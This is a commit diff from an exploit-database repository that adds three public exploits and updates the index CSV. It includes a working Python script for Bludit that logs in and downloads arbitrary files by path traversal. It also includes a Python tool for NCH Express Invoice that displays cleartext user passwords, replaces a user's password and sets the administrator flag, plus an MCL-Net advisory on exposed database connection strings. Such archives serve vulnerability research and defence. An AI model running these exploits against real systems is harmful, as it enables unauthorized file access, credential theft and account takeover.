DB: 2023-06-24

4 changes to exploits/shellcodes/ghdb MCL-Net 4.3.5.8788 - Information Disclosure Abantecart v1.3.2 - Authenticated Remote Code Execution Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated) SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution NCH Express Invoice - Clear Text Password Storage and Account Takeover
2023-06-24 00:16:23 +00:00 · 2023-06-24 00:16:23 +00:00 · c79c4813de
commit c79c4813de
parent ea194c414f
4 changed files with 168 additions and 2 deletions
--- a/exploits/hardware/webapps/51542.txt
+++ b/exploits/hardware/webapps/51542.txt
@ -0,0 +1,15 @@
+# Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure
+# Date: 5/31/2023
+# Exploit Author: Victor A. Morales, GM Sectec Inc.
+# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php
+# Version: 4.3.5.8788 (other versions may be affected)
+# Tested on: Microsoft Windows 10 Pro
+# CVE: CVE-2023-34834
+
+Description:
+Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.
+
+Steps to reproduce:
+1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory.
+2. Browse to the "/file" directory and database entry folders configured
+3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.
--- a/exploits/php/webapps/51541.py
+++ b/exploits/php/webapps/51541.py
@ -0,0 +1,55 @@
+# -*- coding: utf-8 -*-
+#/usr/bin/env python
+
+# Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
+# Date: 2022-07-21
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Vendor Homepage: https://www.bludit.com
+# Software Link: https://github.com/bludit/bludit
+# Version: < 3.13.1
+# Tested on: Debian 10 - PHP Version: 7.3.14
+
+import requests
+import argparse
+from bs4 import BeautifulSoup #pip3 install beautifulsoup4
+
+def main():
+        parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')
+        parser.add_argument('-x', '--url', type=str, required=True)
+        parser.add_argument('-u', '--user', type=str, required=True)
+        parser.add_argument('-p', '--password', type=str, required=True)
+        parser.add_argument('-f', '--file', type=str, required=True)
+        args = parser.parse_args()
+        print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
+        exploit(args)
+
+def exploit(args):
+    s2 = requests.Session()
+
+    url = args.url.rstrip("/")
+
+    #get csrf token
+    r = s2.get(url+'/admin/')
+    soup = BeautifulSoup(r.text, 'html.parser')
+    formtoken = soup.find('input', {'name':'tokenCSRF'})['value']
+
+    #login
+    body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password}
+    r = s2.post(url+'/admin/', data=body, allow_redirects=False)
+    if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1):
+        print("[*] Login OK")
+    else:
+        print("[*] Login Failed")
+        exit(1)
+
+    #arbitrary download
+    r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file)
+    if(r.status_code==200 and len(r.content)>0):
+        print("[*] File:")
+        print(r.text)
+    else:
+        print("[*] Exploit Failed")
+        exit(1)
+
+if __name__ == '__main__':
+	main()
--- a/exploits/windows/local/51540.py
+++ b/exploits/windows/local/51540.py
@ -0,0 +1,93 @@
+# Exploit Title: NCH Express Invoice - Clear Text Password Storage and Account Takeover
+# Google Dork:: intitle:ExpressInvoice - Login
+# Date: 07/Apr/2020
+# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
+# Vendor Homepage: https://www.nchsoftware.com/
+# Software Link: http://www.oldversiondownload.com/oldversions/express-8-05-2020-06-08.exe
+# Version: NCH Express Invoice 8.24 and before
+# CVE Number : CVE-2020-11560
+# CVSS: 7.8 (High)
+# Reference: https://cvewalkthrough.com/cve-2020-11560/
+# Vulnerability Description:
+# Express Invoice is a thick client application that has functionality to allow the application access over the web. While configuring web access function application ask for user details such as username, password, email, etc. Application stores this information in “C:\ProgramData\NCH Software\ExpressInvoice\Accounts” in clear text as well as due to inadequate folder pemtion any Low prevladge authenticated user can access files stored in cleartext format
+#Note: from version 8.24 path changed to “C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts”
+
+import os
+import urllib.parse
+
+# Enable ANSI escape sequences for colors on Windows
+if os.name == 'nt':
+    os.system('')
+
+# Function to decode URL encoding
+def decode_url(url):
+    decoded_url = urllib.parse.unquote(url)
+    return decoded_url
+
+# Function to list files and display as numeric list
+def list_files(file_list):
+    for i, file in enumerate(file_list, start=1):
+        # Omit the part of the file name after %40
+        username = file.split("%40")[0]
+        print(f"{i}. {username}")
+
+# Main program
+print("\033[93mDisclaimer: This script is for educational purposes only.")
+print("The author takes no responsibility for any unauthorized usage.")
+print("Please use this script responsibly and adhere to the legal and ethical guidelines.\033[0m")
+
+agreement = input("\033[93mDo you agree to the terms? (yes=1, no=0): \033[0m")
+if agreement != '1':
+    print("\033[93mYou did not agree to the terms. Exiting the program.\033[0m")
+    exit()
+
+nch_version = input("\033[93mIs the targeted NCH Express Invoice application version less than 8.24? (yes=1, no=0): \033[0m")
+if nch_version == '1':
+    file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts"
+else:
+    file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\Accounts"
+
+file_list = os.listdir(file_directory)
+print("\033[94mUser Accounts:\033[0m")
+list_files(file_list)
+
+selected_file = input("\033[94mSelect the file number for the user: \033[0m")
+selected_file = int(selected_file) - 1
+
+file_path = os.path.join(file_directory, file_list[selected_file])
+with open(file_path, 'r') as file:
+    contents = file.read()
+
+print(f"\033[94mSelected User: {file_list[selected_file].split('%40')[0]}\033[0m")
+
+exploit_option = input("\n\033[94mSelect the exploit option: "
+                       "\n1. Display User Passwords "
+                       "\n2. Account Takeover Using Password Replace "
+                       "\n3. User Privilege Escalation\nOption: \033[0m")
+
+# Exploit actions
+if exploit_option == "1":
+    decoded_contents = decode_url(contents)
+    print("\033[91mPlease find the password in the below string:\033[0m")
+    print(decoded_contents)
+elif exploit_option == "2":
+    new_password = input("\033[92mEnter the new password: \033[0m")
+    current_password = contents.split("Password=")[1].split("&")[0]
+    replaced_contents = contents.replace(f"Password={current_password}", f"Password={new_password}")
+    print("\033[92mSelected user's password changed to: Your password\033[0m")
+    print(replaced_contents)
+    with open(file_path, 'w') as file:
+        file.write(replaced_contents)
+
+elif exploit_option == "3":
+    replaced_contents = contents.replace("Administrator=0", "Administrator=1").replace("Priviligies=2", "Priviligies=1")
+    print("\033[92mUser is now an Administrator.\033[0m")
+    print(replaced_contents)
+    with open(file_path, 'w') as file:
+        file.write(replaced_contents)
+else:
+    print("\033[91mInvalid exploit option. Exiting the program.\033[0m")
+    exit()
+
+print("\033[91mFor more such interesting exploits, visit cvewalkthrough.com\033[0m")
+input("\033[91mPress enter to exit.\033[0m")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -4532,6 +4532,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25813,exploits/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",webapps,hardware,,2013-05-29,2013-05-29,1,CVE-2013-1605;CVE-2013-1604;OSVDB-93709;OSVDB-93708,,,,,http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities
 12092,exploits/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting",2010-04-06,"Nahuel Grisolia",webapps,hardware,,2010-04-05,,0,,,cybsec_advisory_2010_0402.pdf,,,
 44062,exploits/hardware/webapps/44062.md,"McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution",2017-09-07,SecuriTeam,webapps,hardware,,2018-02-15,2018-02-15,0,CVE-2017-3898,,,,,https://blogs.securiteam.com/index.php/archives/3248
+51542,exploits/hardware/webapps/51542.txt,"MCL-Net 4.3.5.8788 - Information Disclosure",2023-06-23,"Victor A. Morales",webapps,hardware,,2023-06-23,2023-06-23,0,CVE-2023-34834,,,,,
 39184,exploits/hardware/webapps/39184.txt,"MediaAccess TG788vn - File Disclosure",2016-01-06,0x4148,webapps,hardware,,2016-01-06,2016-01-06,0,OSVDB-132603,,,,,
 27286,exploits/hardware/webapps/27286.txt,"MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",webapps,hardware,,2013-08-02,2013-08-02,1,CVE-2013-4865;CVE-2013-4864;CVE-2013-4863;CVE-2013-4862;CVE-2013-4861;OSVDB-96050;OSVDB-96049;OSVDB-96048;OSVDB-96047;OSVDB-96046,,,,,
 45036,exploits/hardware/webapps/45036.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download",2018-07-17,LiquidWorm,webapps,hardware,,2018-07-17,2018-07-17,0,,,,,,
@ -13238,7 +13239,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 20788,exploits/php/webapps/20788.txt,"AB Banner Exchange - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",webapps,php,,2012-08-24,2012-08-24,1,OSVDB-84931,,,,,
 16044,exploits/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",2011-01-25,"Dr.0rYX & Cr3W-DZ",webapps,php,,2011-01-25,2011-01-25,0,,,,,,
 40877,exploits/php/webapps/40877.md,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php,,2016-12-06,2016-12-06,0,,,,,,
-51058,exploits/php/webapps/51058.txt,"Abantecart v1.3.2 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26521,,,,,
+51058,exploits/php/webapps/51058.txt,"Abantecart v1.3.2 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-06-23,1,CVE-2022-26521,,,,,
 27934,exploits/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 - 'content.php' SQL Injection",2006-06-01,SpC-x,webapps,php,,2006-06-01,2013-08-29,1,CVE-2006-2853;OSVDB-26226,,,,,https://www.securityfocus.com/bid/18218/info
 28944,exploits/php/webapps/28944.txt,"Abarcar Realty Portal 5.1.5/6.0.1 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",webapps,php,,2006-11-08,2013-10-14,1,,,,,,https://www.securityfocus.com/bid/20970/info
 8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php,,2009-04-26,,1,OSVDB-54287;CVE-2009-1550,,,,,
@ -14895,6 +14896,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
 49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
 51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
+51541,exploits/php/webapps/51541.py,"Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)",2023-06-23,"Antonio Cuomo",webapps,php,,2023-06-23,2023-06-23,0,,,,,,
 51476,exploits/php/webapps/51476.txt,"Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-26,1,CVE-2023-31698,,,,,
 46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
 11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
@ -29448,7 +29450,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30811,exploits/php/webapps/30811.txt,"SimpleGallery 0.1.3 - 'index.php' Cross-Site Scripting",2007-11-26,JosS,webapps,php,,2007-11-26,2014-01-10,1,CVE-2007-6157;OSVDB-39679,,,,,https://www.securityfocus.com/bid/26585/info
 38115,exploits/php/webapps/38115.txt,"SimpleInvoices invoices Module - Customer Field Cross-Site Scripting",2012-12-10,tommccredie,webapps,php,,2012-12-10,2015-09-09,1,CVE-2012-4932;OSVDB-88330,,,,,https://www.securityfocus.com/bid/56882/info
 9336,exploits/php/webapps/9336.txt,"SimpleLoginSys 0.5 - Authentication Bypass",2009-08-03,SirGod,webapps,php,,2009-08-02,,1,OSVDB-63093;CVE-2009-4733;OSVDB-56747,,,,,
-51057,exploits/php/webapps/51057.txt,"SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-03-25,0,CVE-2022-26982,,,,,
+51057,exploits/php/webapps/51057.txt,"SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution",2023-03-25,"Sarang Tumne",webapps,php,,2023-03-25,2023-06-23,1,CVE-2022-26982,,,,,
 3886,exploits/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - 'print.php?news_id' SQL Injection",2007-05-09,Silentz,webapps,php,,2007-05-08,,1,OSVDB-35910;CVE-2007-2598,,,,,
 31929,exploits/php/webapps/31929.txt,"SimpleNotes - Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,sl4xUz,webapps,php,,2008-06-16,2014-02-27,1,,,,,,https://www.securityfocus.com/bid/29755/info
 48424,exploits/php/webapps/48424.txt,"SimplePHPGal 0.7 - Remote File Inclusion",2020-05-05,h4shur,webapps,php,,2020-05-05,2020-05-05,0,,,,,,
@ -40857,6 +40859,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48056,exploits/windows/local/48056.py,"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow",2020-02-12,ZwX,local,windows,,2020-02-12,2020-02-12,0,,,,,,
 47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,,2019-10-11,2019-10-11,0,,,,,,
 15584,exploits/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Local Privilege Escalation",2010-11-20,LiquidWorm,local,windows,,2010-11-20,2010-11-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4981.php
+51540,exploits/windows/local/51540.py,"NCH Express Invoice - Clear Text Password Storage and Account Takeover",2023-06-23,"Tejas Pingulkar",local,windows,,2023-06-23,2023-06-23,0,CVE-2020-11560,,,,,
 21331,exploits/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - 'MRUList201202.dat' File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",local,windows,,2012-09-17,2017-08-24,1,OSVDB-85788,,,http://www.exploit-db.com/screenshots/idlt21500/screen-shot-2012-09-25-at-54104-pm.png,,
 21713,exploits/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - Local Overflow (SEH + DEP Bypass)",2012-10-03,b33f,local,windows,,2012-10-03,2012-10-03,0,OSVDB-85788,,,,,
 47668,exploits/windows/local/47668.txt,"NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths",2019-11-18,"Akif Mohamed Ik",local,windows,,2019-11-18,2019-11-18,0,,,,,,